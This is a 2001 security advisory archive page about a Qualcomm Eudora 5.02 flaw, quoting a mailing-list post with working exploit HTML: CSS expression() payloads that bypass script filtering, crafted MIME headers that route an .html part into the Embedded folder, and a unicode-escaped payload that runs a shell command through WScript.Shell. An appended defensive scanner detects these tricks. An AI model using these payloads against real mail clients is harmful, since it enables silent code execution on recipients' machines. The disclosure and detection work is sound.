SecurityTracker.com
SecurityTracker Archives

Category:   Application (E-mail Client)  >   Eudora
Vendors:   Qualcomm
(Contains Additional Exploit Code) Re: Eudora E-mail Client May Silently Install and Execute Malicious Trojan Software
SecurityTracker Alert ID:  1001137
SecurityTracker URL:  http://securitytracker.com/id/1001137
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 22 2001
Impact:   Execution of arbitrary code via network

Version(s): 5.02 Sponsored Mode
Description:   A vulnerability has been reported in Qualcomm's Eudora e-mail client (5.02, Sponsored Mode) that allows an attacker's executable to be delivered inside an e-mail message and installed and run automatically, without any warning, when the unwitting recipient opens the message.

Demonstration exploit code is provided in the source message. Rather than using script tags, which the client appears to screen for, the demonstration places its script inside a CSS expression() in the STYLE attribute of an image tag; Internet Explorer's rendering engine, used when "use Microsoft viewer" is enabled, evaluates the expression. The report also notes that an inline MIME part can be routed to Eudora's "Embedded" folder by declaring a Content-Type of application/octet-stream while giving the part an .html filename. The exploit code is reportedly effective even when the "Allow executables in HTML content" setting is disabled, which is its default state.

Impact:   An unsuspecting Eudora e-mail client user may inadvertently cause malicious trojan software to be installed and executed simply by reading a malicious e-mail message.
Solution:   No solution was available at the time of this entry. The author of the report suggests disabling "use Microsoft viewer" and "allow executables in HTML content". Note that the latter is off by default and is bypassed by the demonstration code, so disabling the Microsoft viewer is the step that actually closes the hole.
Vendor URL:  www.eudora.com/
Cause:   Access control error
Underlying OS:  Apple (Legacy "classic" Mac), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
Mar 19 2001 Eudora E-mail Client May Silently Install and Execute Malicious Trojan Software



 Source Message Contents

Subject:  Re: feeble.you!dora.exploit


Further to all of this, we include a generic, more illustrative (and
user-friendly, working test) example [at the end of this batch of quotes].

This defeats the so-called "Allow executables in HTML content" being
disabled.

Example at the end of this screed.

On Tue, 20 Mar 2001 11:23:48 -0800 (PST), http-equiv@excite.com wrote:

|  |Jeff Beckley wrote:
|  |
|  |>At 01:38 AM 3/18/2001 -0800, http-equiv@excite.com wrote:
|  |>Silent delivery and installation of an executable on a target
|  |>computer. No client input other than opening an email using
|  |>Eudora 5.02 - Sponsored Mode provided 'use Microsoft viewer'
|  |>and 'allow executables in HTML content' are enabled.
|  |
|  |
|  |The "Allow executables in HTML content" setting is turned off by
|  |default.  The online help and user manual mention that the
|  |setting should remain off for security reasons.
|
|  This of course is 100% correct. Unfortunately on closer examination
|  we find that this too can be defeated quite easily.  Consider the
|  following non-JavaScript:
|
|
|  <!doctype html public "-//w3c//dtd html 4.0 transitional//en">
|
|  <img SRC="file://C:\WINDOWS\APPLIC~1\QUALCOMM\EUDORA\Embedded\malware.gif"
|  height=2 width=2
|  STYLE="left:expression(location.href='http://www.malware.com');"></html>
|
|  <br>
|  <br>
|  </body></html>
|
|  This slips through, with "Allow executables in HTML content" disabled.
|  Therefore the results will be the same:
|
|  <img SRC="" height=1 width=1
|  STYLE="left:expression (malware.location.href='cid:malware.com');"></
|
|  ...etc
|
|  Disable the 'Microsoft Viewer" thing. That's the problem.
|
|  A good repair can be by reviewing all the necessary tricks to inject
|  JavaScript into Hotmail Accounts. These are well documented here and
|  dating back for quite some time. It appears the mail client seeks typical
|  script tags, which is defeated as above.  Additionally you might want to
|  not allow a crafted inline file to transfer automatically to your
|  embedded folder:
|
|  Content-Type: application/octet-stream; charset=iso-8859-1
|  Content-ID: <malware.com>
|  Content-Transfer-Encoding: base64
|  Content-Disposition: inline; filename="You!DORA.html"
|
|  We note that if the content-type is manipulated we can route the file to
|  the 'Embedded' folder. Casual observation suggests image files and *.exe are
|  routed there. While *.html is not, hence the constructed Content-Type:
|  application/octet-stream; charset=iso-8859-1 while the file is:
|  Content-Disposition: inline; filename="You!DORA.html"
|
|
|  ---
|  http://www.malware.com
|
|

This is specifically constructed to fire the ActiveX warning so that it is
visually illustrated (harmless WSH to fire telnet if you click okay)

REPEAT: this is by design and only for illustrative purposes (lest some
idiot complain this demo has a warning and is a lame "exploit").

  <img SRC="cid:malware.com" height=2 width=2
STYLE="left:expression(document.write('\u0020\u0020\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u0076\u0061\u0072\u0020\u0077\u0073\u0068\u003d\u006e\u0065\u0077\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0027\u0057\u0053\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0068\u0065\u006c\u006c\u0027\u0029\u003b\u0020\u0020\u0077\u0073\u0068\u002e\u0052\u0075\u006e\u0028\u0027\u0074\u0065\u006c\u006e\u0065\u0074\u002e\u0065\u0078\u0065\u0027\u0029\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u003c\u0021\u002d\u002d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0061\u006c\u0077\u0061\u0072\u0065\u002e\u0063\u006f\u006d\u0020\u0032\u0032\u002e\u0030\u0032\u002e\u0030\u0031\u0020\u002d\u002d\u003e'))">
  <!-- decoded, the escaped string passed to document.write() is:  <script> var wsh=new ActiveXObject('WScript.Shell');  wsh.Run('telnet.exe');</script> followed by an HTML comment carrying the author's URL and a date -->

Once again:

Tested on win98, IE5.5, "Eudora 5.0.2 -- Sponsored Mode", "Microsoft Viewer"
enabled, "Allow executables in HTML content" DISABLED.


end call

---
http://www.malware.com
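The two bypasses the message above describes, as an added example that is not code from the advisory or the original poster: a mail-side scanner that shows why a filter which only looks for a literal script tag (the check the report says the client appears to perform) lets IE's CSS expression() through, how decoding \uXXXX escapes exposes the script hidden in the demonstration payload, and how to flag a MIME part whose declared Content-Type disagrees with the extension of its Content-Disposition filename. The function names and the extension-to-type table are this example's own assumptions; the sample payload and MIME headers are constructed from the snippets quoted on this page.

```javascript
// Added example, not code from the advisory or the original poster.
// Function names and TYPE_BY_EXT are this example's own assumptions;
// the samples below are constructed from the snippets quoted on the page.

// Decode JavaScript-style \uXXXX escapes so hidden strings become readable.
function decodeUnicodeEscapes(s) {
  return s.replace(/\\u([0-9a-fA-F]{4})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// The check the report suggests the client performs: look for "<script".
function naiveScriptTagFilter(html) {
  return /<script\b/i.test(html);
}

// Broader check: any CSS expression(), javascript: URL, inline event
// handler or script tag counts as active content. It runs on the decoded
// text and tolerates whitespace between "expression" and "(".
function findActiveContent(html) {
  const decoded = decodeUnicodeEscapes(html);
  const checks = [
    ['script-tag', /<script\b/i],
    ['css-expression', /expression\s*\(/i],
    ['javascript-url', /javascript\s*:/i],
    ['event-handler', /\son[a-z]+\s*=/i],
  ];
  return checks.filter(([, re]) => re.test(decoded)).map(([name]) => name);
}

// Parse a block of MIME part headers (one header per line) into an object.
function parsePartHeaders(text) {
  const headers = {};
  for (const line of text.split(/\r?\n/)) {
    const m = line.match(/^([\w-]+):\s*(.*)$/);
    if (m) headers[m[1].toLowerCase()] = m[2];
  }
  return headers;
}

function filenameOf(headers) {
  const m = (headers['content-disposition'] || '').match(/filename="?([^";]+)"?/i);
  return m ? m[1] : null;
}

// Expected media type per extension (assumed table for this example).
const TYPE_BY_EXT = {
  html: 'text/html', htm: 'text/html', gif: 'image/gif',
  jpg: 'image/jpeg', jpeg: 'image/jpeg', exe: 'application/octet-stream',
};

// True when the filename extension and the declared Content-Type disagree,
// e.g. a .html part declared application/octet-stream so that the client
// files it alongside images and executables instead of treating it as HTML.
function mimeTypeMismatch(headers) {
  const ctype = (headers['content-type'] || '').split(';')[0].trim().toLowerCase();
  const name = filenameOf(headers);
  if (!name || !name.includes('.')) return false;
  const ext = name.slice(name.lastIndexOf('.') + 1).toLowerCase();
  return ext in TYPE_BY_EXT && TYPE_BY_EXT[ext] !== ctype;
}

// Constructed samples, built from the snippets quoted in the message.
const EXPRESSION_PAYLOAD =
  '<img SRC="" height=1 width=1 STYLE="left:expression (malware.location.href=\'cid:malware.com\');">';
const ESCAPED_PAYLOAD =
  '<img SRC="cid:malware.com" height=2 width=2 STYLE="left:expression(document.write(' +
  '\'\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\'))">';
const OCTET_STREAM_HTML_PART = [
  'Content-Type: application/octet-stream; charset=iso-8859-1',
  'Content-ID: <malware.com>',
  'Content-Transfer-Encoding: base64',
  'Content-Disposition: inline; filename="You!DORA.html"',
].join('\n');

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  console.log('naive filter catches expression():', naiveScriptTagFilter(EXPRESSION_PAYLOAD));
  console.log('findActiveContent on escaped payload:', findActiveContent(ESCAPED_PAYLOAD));
  console.log('decoded payload:', decodeUnicodeEscapes(ESCAPED_PAYLOAD));
  console.log('octet-stream .html mismatch:', mimeTypeMismatch(parsePartHeaders(OCTET_STREAM_HTML_PART)));
}
```

Run with `node` to see the naive filter accept both payloads while findActiveContent flags the expression() in each and, after decoding, the script tag hidden in the second; the header check flags the application/octet-stream part carrying a .html filename. A real client would of course strip or refuse the content rather than just report it, and would render with the IE engine's active content disabled altogether.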







 
 









Copyright 2021, SecurityGlobal.net LLC